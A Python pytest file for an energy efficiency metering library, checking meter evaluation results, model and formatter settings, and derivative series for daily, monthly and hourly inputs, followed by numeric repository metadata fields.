def test_basic_usage_reporting_only(
meter_input_daily_reporting_only,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_reporting_only)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 18
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
assert derivatives[0]['value'] is not None
assert derivatives[0]['variance'] is not None
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
# 'Cumulative baseline model minus reporting model, normal year',
# 'Cumulative baseline model, normal year',
'Cumulative reporting model, normal year',
# 'Baseline model minus reporting model, normal year',
# 'Baseline model, normal year',
'Reporting model, normal year',
# 'Cumulative baseline model minus observed, reporting period',
# 'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
# 'Baseline model minus observed, reporting period',
# 'Baseline model, reporting period',
'Observed, reporting period',
# 'Masked baseline model minus observed, reporting period',
# 'Masked baseline model, reporting period',
'Masked observed, reporting period',
#'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
#'Heating degree day balance point, baseline period',
#'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
#'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_empty(
meter_input_empty,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_empty)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert results['modeled_energy_trace'] is not None
assert len(results['derivatives']) == 0
def test_bad_meter_input(monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate({})
assert results['status'] == 'FAILURE'
assert results['failure_message'].startswith("Meter input")
def test_strange_interpretation(meter_input_strange_interpretation,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_strange_interpretation)
assert results['status'] == 'FAILURE'
assert results['failure_message'].startswith("Default formatter")
def test_bad_zipcode(meter_input_bad_zipcode):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_bad_zipcode)
assert results['project_id'] is None
assert results['trace_id'] is None
assert results['interval'] is None
derivatives = results['derivatives']
assert len(derivatives) == 8
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
# 'Cumulative baseline model minus reporting model, normal year',
# 'Cumulative baseline model, normal year',
# 'Cumulative reporting model, normal year',
# 'Baseline model minus reporting model, normal year',
# 'Baseline model, normal year',
# 'Reporting model, normal year',
# 'Cumulative baseline model minus observed, reporting period',
# 'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
# 'Baseline model minus observed, reporting period',
# 'Baseline model, reporting period',
'Observed, reporting period',
# 'Masked baseline model minus observed, reporting period',
# 'Masked baseline model, reporting period',
'Masked observed, reporting period',
#'Baseline model, baseline period',
#'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
# 'Temperature, baseline period',
# 'Temperature, reporting period',
# 'Temperature, normal year',
# 'Masked temperature, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_custom_evaluate_args_monthly(
meter_input_monthly,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_monthly,
model=None,
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(None, None),
formatter=(None, None))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=('CaltrackMonthlyModel', None),
formatter=('ModelDataBillingFormatter', None))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(None, {"fit_cdd": False}))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': False, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(None, {"fit_cdd": False}),
formatter=(None, {}))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': False, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
results = meter.evaluate(meter_input_monthly,
model=(CaltrackMonthlyModel, {"fit_cdd": False}),
formatter=(ModelDataBillingFormatter, {}))
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': False}
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] == {}
def test_custom_evaluate_args_daily(
meter_input_daily_elec,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_elec,
model=None,
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True}
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] == {'freq_str': 'D'}
results = meter.evaluate(meter_input_daily_elec,
model=(CaltrackDailyModel, {'fit_cdd': False}),
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] == {'fit_cdd': False}
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] == {'freq_str': 'D'}
def test_ignore_extra_args_daily(
meter_input_daily_elec,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_elec,
model=(None, {'fit_cdd': True, 'grid_search': True, 'extra_arg': 'value'}),
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True, 'extra_arg': 'value'}
def test_ignore_extra_args_monthly(
meter_input_monthly,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_monthly,
model=(None, {'grid_search': True, 'extra_arg': 'value'}),
formatter=None)
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] == {'fit_cdd': True, 'grid_search': True, 'extra_arg': 'value'}
def test_basic_usage_daily_period_start_end(
meter_input_daily_with_period_start_end,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_with_period_start_end)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'daily'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 32
baseline_observed = {d['series']:d for d in derivatives}['Observed, baseline period']
reporting_observed = {d['series']:d for d in derivatives}['Observed, reporting period']
assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == ('2013-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == ('2014-02-01T00:00:00+00:00', '2015-02-01T00:00:00+00:00')
assert derivatives[0]['modeling_period_group'] == ('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Baseline model, baseline period',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_meter_settings_cz2010(meter_input_daily):
meter = EnergyEfficiencyMeter(
weather_station_mapping='CZ2010',
weather_normal_station_mapping='CZ2010'
)
assert meter.weather_station_mapping == 'CZ2010'
assert meter.weather_normal_station_mapping == 'CZ2010'
results = meter.evaluate(meter_input_daily)
assert results['logs'][0] == 'Using weather_source ISDWeatherSource("722874")'
assert results['logs'][1] == 'Using weather_normal_source CZ2010WeatherSource("722874")'
assert results['status'] == 'SUCCESS'
assert results['meter_kwargs'] == {
'weather_station_mapping': 'CZ2010',
'weather_normal_station_mapping': 'CZ2010'
}
def test_basic_usage_hourly(
meter_input_hourly, monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_hourly)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'hourly'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
baseline_observed = {d['series']:d for d in derivatives}['Observed, baseline period']
reporting_observed = {d['series']:d for d in derivatives}['Observed, reporting period']
assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == ('2012-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == ('2014-02-01T00:00:00+00:00', '2015-12-30T00:00:00+00:00')
assert len(derivatives) == 35
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Baseline model, baseline period',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
'Resource curve, normal year',
'Resource curve, reporting period',
'CO2 avoided emissions, normal year',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
| 33.816723
| 146
| 0.642349
| 4,240
| 40,039
| 5.906604
| 0.048349
| 0.080858
| 0.047756
| 0.030666
| 0.93767
| 0.919102
| 0.906445
| 0.891671
| 0.879572
| 0.859328
| 0
| 0.023646
| 0.240565
| 40,039
| 1,183
| 147
| 33.845309
| 0.79998
| 0.052624
| 0
| 0.777907
| 0
| 0
| 0.377283
| 0.042841
| 0
| 0
| 0
| 0
| 0.252326
| 1
| 0.036047
| false
| 0
| 0.013953
| 0.005814
| 0.067442
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ea66eab3ba87442961e7ebf0fa2beadf53afb7e
| 4,441
|
py
|
Python
|
config.py
|
parakrama1995/mem
|
253f506ca176c691da09bab4f84e6e4c7a396730
|
[
"BSD-3-Clause"
] | 645
|
2016-01-10T21:24:39.000Z
|
2022-03-08T06:15:56.000Z
|
config.py
|
parakrama1995/mem
|
253f506ca176c691da09bab4f84e6e4c7a396730
|
[
"BSD-3-Clause"
] | 17
|
2016-05-06T14:30:48.000Z
|
2021-07-03T20:28:32.000Z
|
config.py
|
parakrama1995/mem
|
253f506ca176c691da09bab4f84e6e4c7a396730
|
[
"BSD-3-Clause"
] | 188
|
2016-01-11T00:34:48.000Z
|
2021-09-30T19:13:48.000Z
|
import numpy as np
class BabiConfig(object):
"""
Configuration for bAbI
"""
def __init__(self, train_story, train_questions, dictionary):
self.dictionary = dictionary
self.batch_size = 32
self.nhops = 3
self.nepochs = 100
self.lrate_decay_step = 25 # reduce learning rate by half every 25 epochs
# Use 10% of training data for validation
nb_questions = train_questions.shape[1]
nb_train_questions = int(nb_questions * 0.9)
self.train_range = np.array(range(nb_train_questions))
self.val_range = np.array(range(nb_train_questions, nb_questions))
self.enable_time = True # add time embeddings
self.use_bow = False # use Bag-of-Words instead of Position-Encoding
self.linear_start = True
self.share_type = 1 # 1: adjacent, 2: layer-wise weight tying
self.randomize_time = 0.1 # amount of noise injected into time index
self.add_proj = False # add linear layer between internal states
self.add_nonlin = False # add non-linearity to internal states
if self.linear_start:
self.ls_nepochs = 20
self.ls_lrate_decay_step = 21
self.ls_init_lrate = 0.01 / 2
# Training configuration
self.train_config = {
"init_lrate" : 0.01,
"max_grad_norm": 40,
"in_dim" : 20,
"out_dim" : 20,
"sz" : min(50, train_story.shape[1]), # number of sentences
"voc_sz" : len(self.dictionary),
"bsz" : self.batch_size,
"max_words" : len(train_story),
"weight" : None
}
if self.linear_start:
self.train_config["init_lrate"] = 0.01 / 2
if self.enable_time:
self.train_config.update({
"voc_sz" : self.train_config["voc_sz"] + self.train_config["sz"],
"max_words": self.train_config["max_words"] + 1 # Add 1 for time words
})
class BabiConfigJoint(object):
"""
Joint configuration for bAbI
"""
def __init__(self, train_story, train_questions, dictionary):
# TODO: Inherit from BabiConfig
self.dictionary = dictionary
self.batch_size = 32
self.nhops = 3
self.nepochs = 60
self.lrate_decay_step = 15 # reduce learning rate by half every 25 epochs # XXX:
# Use 10% of training data for validation # XXX
nb_questions = train_questions.shape[1]
nb_train_questions = int(nb_questions * 0.9)
# Randomly split to training and validation sets
rp = np.random.permutation(nb_questions)
self.train_range = rp[:nb_train_questions]
self.val_range = rp[nb_train_questions:]
self.enable_time = True # add time embeddings
self.use_bow = False # use Bag-of-Words instead of Position-Encoding
self.linear_start = True
self.share_type = 1 # 1: adjacent, 2: layer-wise weight tying
self.randomize_time = 0.1 # amount of noise injected into time index
self.add_proj = False # add linear layer between internal states
self.add_nonlin = False # add non-linearity to internal states
if self.linear_start:
self.ls_nepochs = 30 # XXX:
self.ls_lrate_decay_step = 31 # XXX:
self.ls_init_lrate = 0.01 / 2
# Training configuration
self.train_config = {
"init_lrate" : 0.01,
"max_grad_norm": 40,
"in_dim" : 50, # XXX:
"out_dim" : 50, # XXX:
"sz" : min(50, train_story.shape[1]),
"voc_sz" : len(self.dictionary),
"bsz" : self.batch_size,
"max_words" : len(train_story),
"weight" : None
}
if self.linear_start:
self.train_config["init_lrate"] = 0.01 / 2
if self.enable_time:
self.train_config.update({
"voc_sz" : self.train_config["voc_sz"] + self.train_config["sz"],
"max_words": self.train_config["max_words"] + 1 # Add 1 for time words
})
| 39.300885
| 91
| 0.554605
| 533
| 4,441
| 4.403377
| 0.236398
| 0.061355
| 0.076694
| 0.030677
| 0.875586
| 0.858543
| 0.836813
| 0.761824
| 0.730294
| 0.730294
| 0
| 0.031907
| 0.357802
| 4,441
| 112
| 92
| 39.651786
| 0.791024
| 0.200405
| 0
| 0.731707
| 0
| 0
| 0.059565
| 0
| 0
| 0
| 0
| 0.008929
| 0
| 1
| 0.02439
| false
| 0
| 0.012195
| 0
| 0.060976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ecbf1d954ad8ddf802ad0eda35dd930e06061c4
| 8,362
|
py
|
Python
|
tests/test_server.py
|
cloudscale-ch/cloudscale-cli
|
29e7d0c3820b5903a6b509b9edef3063f388fd7c
|
[
"MIT"
] | 7
|
2020-07-18T07:15:58.000Z
|
2020-12-10T13:25:08.000Z
|
tests/test_server.py
|
cloudscale-ch/cloudscale-cli
|
29e7d0c3820b5903a6b509b9edef3063f388fd7c
|
[
"MIT"
] | 18
|
2020-08-17T22:12:34.000Z
|
2021-05-17T14:59:07.000Z
|
tests/test_server.py
|
cloudscale-ch/cloudscale-cli
|
29e7d0c3820b5903a6b509b9edef3063f388fd7c
|
[
"MIT"
] | null | null | null |
from cloudscale import CLOUDSCALE_API_URL
from cloudscale_cli.cli import cli
import responses
import click
from click.testing import CliRunner
SERVER_RESP = {
"uuid": "47cec963-fcd2-482f-bdb6-24461b2d47b1",
"name": "db-master",
"status": "running",
"zone": {
"slug": "lpg1"
},
"flavor": {
"slug": "flex-4",
},
"image": {
"slug": "debian-9",
},
"server_groups": [],
"anti_affinity_with": [],
"tags": {
"project": "gemini"
}
}
@responses.activate
def test_server_get_all():
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers',
json=[SERVER_RESP],
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
])
assert result.exit_code > 0
@responses.activate
def test_server_get_all_fitlered():
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers',
json=[SERVER_RESP],
status=200)
runner = CliRunner()
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
'--filter-tag',
'project=gemini'
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
'--filter-tag',
'project'
])
assert result.exit_code == 0
@responses.activate
def test_server_get_by_uuid():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'show',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'show',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_delete():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/unknown',
json=SERVER_RESP,
status=200)
responses.add(
responses.DELETE,
CLOUDSCALE_API_URL + '/servers/' + uuid,
status=204)
responses.add(
responses.DELETE,
CLOUDSCALE_API_URL + '/servers/unknown',
json={
"detail": "Not found."
},
status=404)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'delete',
uuid,
])
assert result.exit_code == 1
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'delete',
'--force',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'delete',
'--force',
'unknown',
])
assert result.exit_code > 0
def test_server_missing_api_key():
runner = CliRunner()
result = runner.invoke(cli, [
'server',
'list',
])
assert result.exit_code == 1
@responses.activate
def test_server_create():
name = "db-master"
flavor = "flex-4"
image = "debian9"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers',
json=SERVER_RESP,
status=201)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'create',
'--name',
name,
'--flavor',
flavor,
'--image',
image
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'create',
'--name',
name,
'--flavor',
flavor,
'--image',
image
])
assert result.exit_code > 0
@responses.activate
def test_server_update():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
name = "db-master"
responses.add(
responses.PATCH,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.PATCH,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'update',
'--name',
name,
'--tag',
'project=gemini',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'update',
'--name',
name,
'--tag',
'project=gemini',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_start():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/start',
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/start',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'start',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'start',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_stop():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/stop',
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/stop',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'stop',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'stop',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_reboot():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/reboot',
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/reboot',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'reboot',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'reboot',
uuid,
])
assert result.exit_code > 0
| 22.298667
| 60
| 0.513753
| 808
| 8,362
| 5.179455
| 0.105198
| 0.074552
| 0.091756
| 0.126404
| 0.9092
| 0.887694
| 0.867622
| 0.858303
| 0.82509
| 0.777539
| 0
| 0.041355
| 0.343578
| 8,362
| 374
| 61
| 22.358289
| 0.721079
| 0
| 0
| 0.858357
| 0
| 0
| 0.157618
| 0.030136
| 0
| 0
| 0
| 0
| 0.056657
| 1
| 0.028329
| false
| 0
| 0.014164
| 0
| 0.042493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94a2baa02699768c32c93318713c3f38db98c875
| 168
|
py
|
Python
|
simple_ddpm/__init__.py
|
peterhessey/denoising-diffusion-pytorch
|
031e31b46928fa87e51e8c25d778039b65fa1c38
|
[
"MIT"
] | null | null | null |
simple_ddpm/__init__.py
|
peterhessey/denoising-diffusion-pytorch
|
031e31b46928fa87e51e8c25d778039b65fa1c38
|
[
"MIT"
] | null | null | null |
simple_ddpm/__init__.py
|
peterhessey/denoising-diffusion-pytorch
|
031e31b46928fa87e51e8c25d778039b65fa1c38
|
[
"MIT"
] | null | null | null |
from simple_ddpm.main import Trainer
from simple_ddpm.gaussian_diffusion import GaussianDiffusion
from simple_ddpm.u_net import Unet
import simple_ddpm.helper_functions
| 42
| 60
| 0.89881
| 25
| 168
| 5.76
| 0.56
| 0.277778
| 0.291667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077381
| 168
| 4
| 61
| 42
| 0.929032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
94ef4fde4d5af9bdc7bb5a9cba7708cb8e8f5c43
| 209
|
py
|
Python
|
challenges/shift-array/test_shift_array.py
|
brandonholderman/data-structures-and-algorithms
|
9b9aa0eac1fe305d9655537c90a24dd263a42df9
|
[
"MIT"
] | null | null | null |
challenges/shift-array/test_shift_array.py
|
brandonholderman/data-structures-and-algorithms
|
9b9aa0eac1fe305d9655537c90a24dd263a42df9
|
[
"MIT"
] | null | null | null |
challenges/shift-array/test_shift_array.py
|
brandonholderman/data-structures-and-algorithms
|
9b9aa0eac1fe305d9655537c90a24dd263a42df9
|
[
"MIT"
] | null | null | null |
import shift_array as sa
def test_insert_shift_array():
assert sa.insert_shift_array([1, 2, 3, 4], 40) == [1, 2, 40, 3, 4]
def test_empty_shift_array():
assert sa.insert_shift_array([], 46) == [46]
| 23.222222
| 70
| 0.669856
| 37
| 209
| 3.486486
| 0.432432
| 0.387597
| 0.372093
| 0.27907
| 0.527132
| 0.527132
| 0.527132
| 0
| 0
| 0
| 0
| 0.092486
| 0.172249
| 209
| 8
| 71
| 26.125
| 0.653179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
a2085610c62ff7ce2ddf76df90e38f510813ff6c
| 37
|
py
|
Python
|
aiida_sirius/upf_to_json/__init__.py
|
simonpintarelli/aiida-sirius
|
5dc968cc4a98a5d0b018f54c4c7023b2a2682795
|
[
"MIT"
] | null | null | null |
aiida_sirius/upf_to_json/__init__.py
|
simonpintarelli/aiida-sirius
